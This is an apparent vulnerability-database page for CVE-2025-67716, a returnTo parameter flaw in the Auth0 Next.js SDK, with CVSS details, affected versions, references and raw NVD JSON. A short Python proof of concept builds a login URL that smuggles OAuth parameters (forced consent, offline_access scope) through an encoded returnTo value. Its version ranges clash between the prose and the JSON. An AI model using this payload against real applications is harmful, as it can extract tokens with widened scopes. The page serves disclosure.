CVE-2025-67716

Description

The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. Versions 4.9.0 through 4.12.1 contain an input-validation flaw in the returnTo parameter, which could allow attackers to inject unintended OAuth query parameters into the Auth0 authorization request. Successful exploitation may result in tokens being issued with unintended parameters. This issue is fixed in version 4.13.0.

CVSS Details

CVSS Score

5.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:auth0:nextjs-auth0:*:*:*:*:*:node.js:*:* - VULNERABLE

Auth0 Next.js SDK >= 4.9.0 且 < 4.13.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import urllib.parse

# Malicious returnTo URL that injects OAuth parameters
malicious_return_to = "https://victim-app.com/callback?prompt=consent&scope=openid%20profile%20email%20offline_access"

# Encode the malicious returnTo URL
encoded_return_to = urllib.parse.quote(malicious_return_to, safe='')

# Construct the attack URL
attack_url = f"https://victim-app.com/api/auth/login?returnTo={encoded_return_to}"

print(f"Attack URL: {attack_url}")
print(f"\nWhen victim clicks this link, the OAuth authorization request will include injected parameters:")
print(f"- prompt=consent (forces consent screen)")
print(f"- scope extended with offline_access (requests refresh token)")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67716
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67716
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67716/
[4] VulDB https://vuldb.com/cve/CVE-2025-67716
[5] https://github.com/auth0/nextjs-auth0/commit/35eb321de3345ccf23e8c0d6f66c9f2f2f57d26c
[6] https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-mr6f-h57v-rpj5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67716", "sourceIdentifier": "[email protected]", "published": "2025-12-11T01:16:00.890", "lastModified": "2026-03-06T19:29:09.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. Versions 4.9.0 through 4.12.1 contain an input-validation flaw in the returnTo parameter, which could allow attackers to inject unintended OAuth query parameters into the Auth0 authorization request. Successful exploitation may result in tokens being issued with unintended parameters. This issue is fixed in version 4.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-184"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:auth0:nextjs-auth0:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "4.9.0", "versionEndExcluding": "4.12.1", "matchCriteriaId": "49F414AC-40B3-474B-B15C-D6962933338C"}]}]}], "references": [{"url": "https://github.com/auth0/nextjs-auth0/commit/35eb321de3345ccf23e8c0d6f66c9f2f2f57d26c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-mr6f-h57v-rpj5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}